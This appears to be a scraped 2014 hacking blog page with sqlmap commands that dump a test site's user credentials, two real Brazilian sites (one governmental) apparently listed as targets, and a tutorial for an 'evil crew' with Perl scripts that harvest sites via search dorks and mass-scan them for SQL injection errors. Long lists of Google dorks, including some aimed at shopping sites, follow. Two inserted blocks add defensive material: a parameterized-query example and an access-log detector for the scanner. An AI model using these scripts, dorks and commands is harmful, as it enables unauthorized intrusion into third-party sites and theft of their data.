Tuesday, March 24, 2015

Thursday, July 31, 2014

Login and Password



Friday, July 25, 2014

./sqlmap.py  -h
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C 'uname,pass' --dump
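
The `-b`, `--dbs`, `--tables` and `--dump` runs above all depend on the `cat` value being concatenated into a SQL statement. The following Python sketch is an added example, not code from this page or from sqlmap: it uses an in-memory SQLite table (table, columns and rows are constructed assumptions) to show the concatenated query beside a validated, parameterized one that also stops returning driver errors to the client.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 1, "poster"), (2, 1, "print"), (3, 2, "frame")])
    return db

def list_products_vulnerable(db, cat):
    # The request value is pasted into the SQL text, so a stray quote changes
    # the statement itself, and the driver's error text is sent back verbatim.
    try:
        sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
        rows = db.execute(sql).fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error as exc:
        return 500, "SQL error: %s" % exc

def list_products_hardened(db, cat):
    # Reject anything that is not a short ASCII integer, bind the value as a
    # parameter, and never echo database errors to the client.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        return 400, "bad request"
    try:
        sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
        rows = db.execute(sql, (int(cat),)).fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error:
        return 500, "internal error"

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), list_products_vulnerable(db, value),
              list_products_hardened(db, value))
```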

http://www.euclidesdacunha.sp.gov.br/novo/noticias.php?ID=1


http://www.iseape.com.br/noticias.php?id=1

Tuesday, July 22, 2014

How to find sites vulnerable to SQL injection

Hey there, evil crew, how's it going? lol
Today I'll be teaching how to create a scanner that searches for sites vulnerable to SQL injection. Well, enough talk, let's go!

Step 1: download ActivePerl-5.16 (http://www.mediafire.com/download/wpvaa96vjcibsk1/ActivePerl-5.16.rar) so that you can run the files!

Step 2: open Notepad and paste this code:

#!/usr/bin/perl
#Coded: Brlo0ping
 use LWP::UserAgent;
print "----|| Coded: Brlo0ping ||-----||Acc3ss ro0t:~# ----||\n";
print "Digite um dork: ex:(noticias.php?id=100)\n" ;
print "-->>";
$dork = <STDIN>;
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '<h3><a href="');
if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
open (txt,">>lista.txt");
print txt  $s,"\n";
close(txt);
}
if ($check == -1) {
last;
}
}
system("lista.txt");
exit;

... and save it on your desktop as scan.pl

Step 3: open Notepad again and paste this code:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

if (!$ARGV[0]) {

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];

if ($variavelbanner % 2 == 0) {

&bannerUm();
exit;

}
else {
&bannerDois();
exit;
}
}

&bannerDois();

print q {
  Scaneando WebSite...


};

open( SITE, "< $ARGV[0]" ) or die( "Nao foi possível abrir o arquivo: $!" );

our @array = <SITE>;

$numero = $#array;

for ($i = 0; $i <= $numero; $i++) {

$Dominio = "$array[$i]";

if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }


$cmd = "'";

$site = "$Dominio$cmd";

my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);

if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {

print "\n \t $Dominio \n";

open (NOTEPAD, ">> Sites Vulneraveis.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);

}
}

print q {

FIM DO SCANNEAMENTO !

};


sub bannerUm {

print q {



_______________________
< Hello !! Welcome !! >
-----------------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_| Scanner v 1.0



Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual


};


}

sub bannerDois {

print q {
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| Scanner v 1.0



Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual



};

}

... and save it as sql.pl on your desktop!

Step 4: Run scan.pl
Now you have to enter a DORK, e.g. noticias.php?id=12 (you can use others).
Let's go.

Type: noticias.php?id=12 and press Enter.
It will start scanning all the sites that have this DORK and will create a file called "lista.txt"; if you want to stop, just press Ctrl + C.

Step 5: now open CMD. For those who don't know how, press Start + R, a dialog box will open; type cmd and press Enter.

Step 6: there you will be in the following folder:
C:\Users\USER>

Type cd desktop and press Enter, and it will look like this:

C:\Users\USER\Desktop>

Type sql.pl lista.txt and press Enter. The scan will now start and will create a txt file called Sites Vulneraveis.

Done, hehehe, finally. So that's it, I hope you like it, and if you still have questions, comment below and I'll answer as soon as I have time. Byeee!!!
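
Seen from the server side, sql.pl leaves a recognisable trace: each request is the listed URL with a single quote appended, sent by an `LWP::UserAgent` created without an agent string, so it carries LWP's default `libwww-perl/<version>` header. The following Python log check is an added example, not part of the original post: it flags that pattern in combined-format access logs. The log lines, IP addresses and the `min_hits` threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
TOOL_UA = re.compile(r"^(libwww-perl|sqlmap)/", re.I)  # default tool agents

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jul/2014:10:00:01 +0000] "GET /noticias.php?id=12%27 HTTP/1.1" 500 312 "-" "libwww-perl/6.05"
203.0.113.7 - - [22/Jul/2014:10:00:02 +0000] "GET /produtos.php?cat=3' HTTP/1.1" 200 5120 "-" "libwww-perl/6.05"
198.51.100.20 - - [22/Jul/2014:10:01:00 +0000] "GET /noticias.php?id=12 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.21 - - [22/Jul/2014:10:02:00 +0000] "GET /busca.php?q=d%27 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
""".splitlines()

def quote_probe(target):
    """True if any query value ends with a single quote (raw or %27)."""
    query = urlsplit(target).query
    return any(v.endswith("'") for _, v in parse_qsl(query, keep_blank_values=True))

def find_probers(lines, min_hits=2):
    """Group quote probes by client; report repeat senders and tool agents."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and quote_probe(m["target"]):
            hits[m["ip"]].append((int(m["status"]), bool(TOOL_UA.match(m["ua"]))))
    report = {}
    for ip, probes in hits.items():
        tool = any(is_tool for _, is_tool in probes)
        # One trailing quote from a browser can be a legitimate search term,
        # so a single hit is reported only when a scripted agent sent it.
        if len(probes) >= min_hits or tool:
            report[ip] = {
                "probes": len(probes),
                # A 5xx reply to a quote probe suggests the query broke.
                "server_errors": sum(1 for status, _ in probes if status >= 500),
                "tool_ua": tool,
            }
    return report

if __name__ == "__main__":
    print(find_probers(SAMPLE_LOG))
```

A non-zero `server_errors` count also identifies the pages that return a database error to a quote, which are the ones to fix first.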

Google Dorks



inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=


inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Dorks - Shopping Sites

DORKS FOR SHOPPING SITES!!

cat.asp?cat=
productlist.asp?catalogid=
Category.asp?category_id=
Category.cfm?category_id=
category.asp?cid=
category.cfm?cid=
category.asp?cat=
category.cfm?cat=
category.asp?id=
index.cfm?pageid=
category.asp?catid=
Category.asp?c=
Category.cfm?c=
productlist.cfm?catalogid=
productlist.asp?catalogid=
viewitem.asp?catalogid=
viewitem.cfm?catalogid=
catalog.cfm?catalogId=
catalog.asp?catalogId=
department.cfm?dept=
department.asp?dept=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
product_detail.asp?catalogid=
product_detail.cfm?catalogid=
product_list.asp?catalogid=
product_list.cfm?catalogid=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
search_results.cfm?txtsearchParamCat=
search_results.asp?txtsearchParamCat=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
store-page.cfm?go=
store-page.asp?go=
Detail.cfm?CatalogID=
Detail.asp?CatalogID=
browse.cfm?category_id=
view.cfm?category_id=
products.cfm?category_id=
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id=
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?catalogid=
shopdisplayproducts.cfn?catalogid=
displayproducts.cfm?category_id=
displayproducts.asp?category_id=
DisplayProducts.asp?prodcat=
DisplayProducts.cfm?prodcat=x
productDetail.cfm?ProductID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp?CatId=
Store_ViewProducts.asp?Cat=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productID=
ProductDetails.asp?prdId=12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?product_id=
products.php?subcat_id=
product.php?product_id=
view_product.cfm?productID=
product_details.asp?prodid=
shopdisplayproducts.cfm?id=
displayproducts.cfm?id